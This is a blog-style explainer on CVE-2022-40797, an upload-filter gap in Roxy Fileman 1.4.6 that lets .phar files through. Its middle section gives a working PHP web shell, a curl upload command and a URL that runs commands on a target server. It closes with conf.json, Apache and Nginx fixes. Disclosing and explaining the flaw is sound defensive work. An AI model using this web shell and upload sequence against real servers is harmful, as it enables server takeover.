If you use Roxy Fileman 1.4.6—an open-source web file manager popular among PHP developers for WYSIWYG editors like TinyMCE and CKEditor—there’s a critical vulnerability you might not know about. Discovered in late 2022, CVE-2022-40797 allows remote attackers to fully take over web servers via a clever file upload trick. This long-read post explains the bug, shows you the code, and walks you through an actual exploit scenario.
Introduction: What is Roxy Fileman?
Roxy Fileman is a file manager that lets users browse, upload, and edit files in a web application. It’s often embedded in content management systems, especially ones supporting rich text editors.
About CVE-2022-40797
CVE-2022-40797 is a critical vulnerability affecting Roxy Fileman up to version 1.4.6. An attacker can upload a malicious file and get remote code execution (RCE) on the web server—sometimes with just one HTTP request.
The Filtering Flaw
The main issue is in conf.json, the default configuration file for Roxy Fileman. Here’s the relevant snippet:
{
"FORBIDDEN_UPLOADS": ".php,.php4,.php5"
}
What’s missing: The filter does NOT block .phar files!
Why is This a Problem?
On many Apache and Nginx setups, if you access a .phar file through a URL, the PHP interpreter picks it up and executes it, just like a .php file.
Exploiting CVE-2022-40797 Step by Step
Let’s walk through a basic exploitation proof-of-concept so you fully understand the impact.
Create a simple PHP web shell and save it as shell.phar
<?php
// shell.phar
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
Step 2: Upload the File
Using the Roxy Fileman interface (or by directly crafting a POST request to the upload endpoint), upload shell.phar:
- Upload URL: /fileman/php/upload.php?type=files
Example using curl
curl -F "file[]=@shell.phar" https://target-site.com/fileman/php/upload.php?type=files
Now, access your uploaded file
https://target-site.com/userfiles/files/shell.phar?cmd=id
If the server is vulnerable, this executes your command (id) on the target system. You’ve got a working web shell!
Why Does the Bypass Work?
The upload filter only rejects files with .php, .php4, and .php5 extensions. Many developers don’t realize that .phar files (PHP archive format) can contain and execute PHP code if the server isn’t explicitly configured to block them. Some PHP installations (especially with default Apache or Nginx+php-fpm setups) treat any .phar file as executable PHP. So all an attacker needs to do is upload a .phar with valid PHP code.
Official Disclosure & References
- NVD entry for CVE-2022-40797
- Roxy Fileman GitHub
- Exploit Database: CVE-2022-40797
Mitigation
Immediate fix:
Explicitly block .phar and any other PHP-related extensions in your conf.json
{
"FORBIDDEN_UPLOADS": ".php,.php4,.php5,.phar"
}
Better solution:
- Upgrade to a version where the patch is applied (check the official repo).
For Apache
<FilesMatch "\.(php|php4|php5|phar)$">
Deny from all
</FilesMatch>
For Nginx
location ~* \.(php|php4|php5|phar)$ {
deny all;
}
Final Thoughts
CVE-2022-40797 is a striking reminder: security isn’t just about the obvious extensions. Attackers look for *any* way to execute code. If you use Roxy Fileman (or any PHP filemanager), update your upload filters and your server config.
Stay safe!
Exclusive insight:
Even if you remove .phar from the allowed uploads, watch out for other tricky PHP extensions (.pht, .php7, .phtml). Always check your server’s executable file mapping and strictly control what file types you accept.
Need more help?
- How to Secure File Uploads in PHP
- More about PHP file handling and dangerous extensions
Have you checked your FORBIDDEN_UPLOADS lately?
Don’t wait until it’s too late and patch this bug now!
Timeline
Published on: 11/09/2022 07:15:00 UTC
Last modified on: 01/31/2023 17:42:00 UTC